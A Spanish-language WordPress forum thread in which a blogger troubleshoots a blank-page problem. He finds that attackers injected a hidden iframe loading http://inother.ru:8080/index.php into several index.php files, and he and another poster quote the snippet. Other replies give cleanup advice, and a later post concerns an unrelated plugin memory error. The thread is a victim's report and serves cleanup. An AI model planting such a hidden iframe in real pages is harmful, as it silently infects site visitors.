Desaparecio mi Blog, pag en blanco

Inicio Foros WordPress General WordPress.org Desaparecio mi Blog, pag en blanco

Este debate contiene 16 respuestas, tiene 7 mensajes y lo actualizó  etiqi hace 8 años, 3 meses.

  • Autor
    Publicaciones
  • #14329

    ralcesar
    Participante

    <p>Hola :-)</p>
    <p>Hace 2 dias está pasando algo raro con mi blog, cuanto intento acceder me carga una pagina en blanco de 0kB.</p>
    <p>Al principio no le di importancia porque estaba caido el servidor de phpMyAdmin y supuse que era debido a problemas con la BD, ahora que lo pienso aun sin BD me tendría que salir algo.</p>
    <p>Lo raro es que no toque nada en la instalación, ni cree un nuevo post, ni actualizar wordpress, ni plugin, nada de nada.</p>
    <p>Es como si no existieran archivos pero me fijo en el ftp y está todo como corresponde.</p>
    <p>Estoy/estaba usando la versión 2.8.3, cuando apareció la inyección de los admins fantasmas, me fije y mi blog no estaba afectado.</p>
    <p>¿Alguna idea de que puede estar mal? </p>
    <p>URL: ayudaelectronica.com
    </p>

  • #32060

    imported_Paulo
    Participante

    Pues si que es raro, lo que puede ser es que el servidor esté redireccionando mal. Revisa la carpeta a la que apunta el dominio y mira si esa dirección contiene la instalción de wordpress.

    Lo que parece que pasa es que el servidor tiene una carpeta vacia asociada a la raiz del dominio. Pobar a cambiarla.

    Saludos!

  • #32061

    ralcesar
    Participante

    la instalación del blog esta dentro de la carpeta URL.com/blog, como se ve el .htaccess si funciona porque hace la redireccion corectamente.

    ayudaelectronica == AE

    Desde AE.com, http://www.AE.com, AE.com.ar, http://www.AE.com.ar siempre redirecciona correctamente hacia donde esta la instalacion de wordpress que es en AE.com/blog

    Voy a probar a subir todo los archivos de vuelta 😕 y comento que tal me fue

    PD: Es cierto que si la pag esta caida 10 dias google te saca del index?? 😐

  • #32063

    imported_Li Chong
    Participante

    Revisa si no borraste la carpeta del theme que estabas usando. O sea; cambia el template.

  • #32065

    ralcesar
    Participante

    No borre nada, no puedo cambiar el template porque no carga nada de nada queda la pag en blanco, me fije en los archivos y estaba todo bien.

    Acabo de borrar todos los archivos del hosting y vuelto a subir un backup y ahora todo perfecto de vuelta. Me quedo con la duda nomas de que puede haber pasado.

  • #32067

    imported_Li Chong
    Participante

    pero no probaste a meterte por (tudominio)/wp-login.php?

  • #32070

    imported_study
    Participante

    Me pa que no estban ejecutandose los script php, porque aun cuando sea caen las bases de datos o wordpress o el mismo server tiran algun error.

  • #32089

    zenenxd
    Participante

    Bueno aver esto si me parece muy raro ami tambien me paso! ya me ha pasado 3 veses! la verdad no se que sera al principio pense que era por los plugins q instalaba pero luego me doy cuenta… q al parecer es un error de WordPress 2.8.4… Me gustaria saber alguna solucion! lo raro lo siguiente! El blog esta en funcionamiento y luego deja de funcionar es como si alguien mas tubiese acceso al hosting donde esta alojado el blog…!

    Me gustaria saber algunas medidas de seguridad para mi blog! con algun tutorial! muchas gracias!
    Atte. Venom

  • #32090

    ralcesar
    Participante

    Bueno despues de que el blgo estaba funcionando perfecto, hasta puse un post nuevo, llego de la facu quiero entrar al panel de administracion y de vuelta zass pag en blanco!!!!!!

    Por lo qu volví a cargar el backup y de paso me lei el post en AW sobre cuando el blog queda en blanco y cree el archivo errores.php que recomienda.

    Cuando se termino el upload de los archivos entro al index para ver que este todo bien y me doy con que al final de la pagina me aparece.

    [quote]
    This webpage appears to be infected with a virus.

    If you are the webmaster of this site you should log into your account and check / remove any hidden iframes from the page. Once this is completed the page will display.
    You should also change all passwords for your hosting account control panel, then scan your PC with a recent antivirus product / spyware checker, then update all php scripts on your hosting account to the most recent versions. Then you should view the following documents regarding security
    http://www.google.com/search?q=mysql+injection
    http://en.wikipedia.org/wiki/Cross-site_scripting
    http://www.google.com/search?q=php+script+vulnerabilities
    http://en.wikipedia.org/wiki/Remote_File_Inclusion
    http://en.wikipedia.org/wiki/SQL_injection%5B/quote%5D

    HELPPPP 😯

    Tengo la version 2.8.4

  • #32098

    imported_j.conti
    Participante

    Hola

    Leete estas entradas:

    http://ayudawp.com/otra-solucion-al-administrador-fantasma/
    http://ayudawp.com/solucion-temporal-al-problema-del-administrador-fantasma/
    http://ayudawp.com/permalinks-cambiados-a-evalbase64_decode_serverhttp_referer/

    No creo que sea específicamente tu problema, pero pero debes comenzar mirando que no tengas un Administrador Fantasma que tenga el control de tu blog.

    Un saludo

  • #32102

    ralcesar
    Participante

    Gracias

    Ya borre todos los demas usuarios de la BD, estan registrados desde hace mucho tiempo pero nunca aportaron nada :P.

    Un usuario me llamo la atención (amante) [email protected]…com que se registro el 31 de Agosto, pero nunca me llego el mail avisándome de tal registro.

    Estoy revisando el backup local, hasta ahora lo unico que encontre fue en el index del wp-content unas lineas en php [b]golden is good[/b] no tienen q estar ahí pero tampoco creo que sean las culpables

    EDIT: son las culpables, en la version del server del archivo tiene más lineas y no me quedan dudas que es eso.

    [code]<?php
    // Silence is golden.

    <div style=”display:none”></div>
    <div style=”display:none”><iframe src=”http://inother.ru:8080/index.php” width=670 height=403 ></iframe></div>[/code]

    Ese código además del index.php de la carpeta wp-content también lo tenia el index.php de la instalación de WP y el index.php de todos los themes: activo, classic y default

    Encima el muy hdp! al agregarse las lineas maliciosas borra lineas correctas por lo que el tamaño del archivo no se modifica , lo note viendo que faltaba el llamado al footer, empecé a revisar los que habia corregido y todos estaban incompletos

  • #32120

    ralcesar
    Participante

    Nooooo 😕 vovio a pasar lo mismo

  • #32130

    imported_Li Chong
    Participante

    <div style=”display:none”></div>
    <div style=”display:none”><iframe src=”http://inother.ru:8080/index.php” width=670 height=403 ></iframe></div>

    eso, es mugre. Es código malicioso.

    Borra todo lo que tengas en el FTP. Luego, subes instalación limpia. Vas a Opciones > Exportar. Ahora sí, partes de cero; instalación absolutamente limpia (arrasar base de datos y wp-content) Una vez reestablecido todo, asegurarte con .htaccess.
    Los chistosos te tienen de casero (chilenismo para decir que estás siendo blanco habitual)
    A mí me sirvió dejar el servidor vacío una semana, en todo caso.
    Recuerda que si usas filezilla, pedir que fuerze el mostrar archivos ocultos. También borrarlos.
    Escribo como Roxin, qué horror.

  • #32136

    ralcesar
    Participante

    Hice exactamente lo que indicas, pero volvió a suceder.

    Ya examine mi PC por las dudas, con antivirus antispyware, antirootkies, etc y esta limpia; analice con varios softwares distintos.

  • #32156

    zenenxd
    Participante

    Ami tambien me avia aparecido eso de:
    [quote][code]This webpage appears to be infected with a virus.

    If you are the webmaster of this site you should log into your account and check / remove any hidden iframes from the page. Once this is completed the page will display.
    You should also change all passwords for your hosting account control panel, then scan your PC with a recent antivirus product / spyware checker, then update all php scripts on your hosting account to the most recent versions. Then you should view the following documents regarding security
    http://www.google.com/search?q=mysql+injection
    http://en.wikipedia.org/wiki/Cross-site_scripting
    http://www.google.com/search?q=php+script+vulnerabilities
    http://en.wikipedia.org/wiki/Remote_File_Inclusion
    http://en.wikipedia.org/wiki/SQL_injection%5B/code%5D%5B/quote%5D

    Bueno ami me paso lo mismo!
    ya es la 3era vez q me pasa la verdad! Eh echo hasta lo imposible!
    Lo q hise fue! FOrmatie mi pc
    Cambie contraseña del host y instale wordpress limpio aver que pasa!
    Luego les cuento aver si se keda en blanco de nuevo!

  • #32164

    ralcesar
    Participante

    Ni en pedo formateo mi máquina 😡

    Bueno por lo menos el mio por ahora lleva un dia online, ya perdí la cuenta de cuantas veces instale el wordpress limpio

  • #45011

    etiqi
    Participante

    buenas

    pues me encuentro exactamente igual, uso wordpress 3.0.1 i nextgen 1.5.5 (aunque con la beta 1.6 también me pasa), y me aparecen en blanco upload.php, plugins.php, profile.php…

    Ahora he visto un archivo que se llama error_log y aparecen muchas lineas del estilo:

    [31-Aug-2010 17:34:06] PHP Fatal error: Allowed memory size of 33554432 bytes exhausted (tried to allocate 491520 bytes) in /home/astroemp/public_html/wp-content/plugins/nextgen-gallery/admin/manage-images.php on line 479

    que se corresponden en cada vez que me aparece una pagina en blanco. He mirado en manage-images.php, y aparece esto (pongo un trozo)

    471 <div class=”tablenav”>
    472 <input type=”submit” class=”button-primary action” name=”updatepictures” value=”<?php _e(‘Save Changes’, ‘nggallery’); ?>” />
    473 <?php if ( $page_links ) : ?>
    474 <div class=”tablenav-pages”><?php $page_links_text = sprintf( ‘<span class=”displaying-num”>’ . __( ‘Displaying %s–%s of %s’ ) . ‘</span>%s’,
    475 number_format_i18n( ( $_GET[‘paged’] – 1 ) * $nggdb->paged[‘objects_per_page’] + 1 ),
    476 number_format_i18n( min( $_GET[‘paged’] * $nggdb->paged[‘objects_per_page’], $nggdb->paged[‘total_objects’] ) ),
    477 number_format_i18n( $nggdb->paged[‘total_objects’] ),
    478 $page_links

    479 ); echo $page_links_text; ?></div>

    480 <?php endif; ?>
    481 </div>
    482 </form>
    483 <br class=”clear”/>
    484 </div><!– /#wrap –>

    He separado la 479 que es la que parece que contiene un error

    alguna propuesta? no tengo ni idea de que hacer! 🙁

El foro ‘General WordPress.org’ está cerrado y no se permiten nuevos debates ni respuestas.

Pin It on Pinterest

Ir al contenido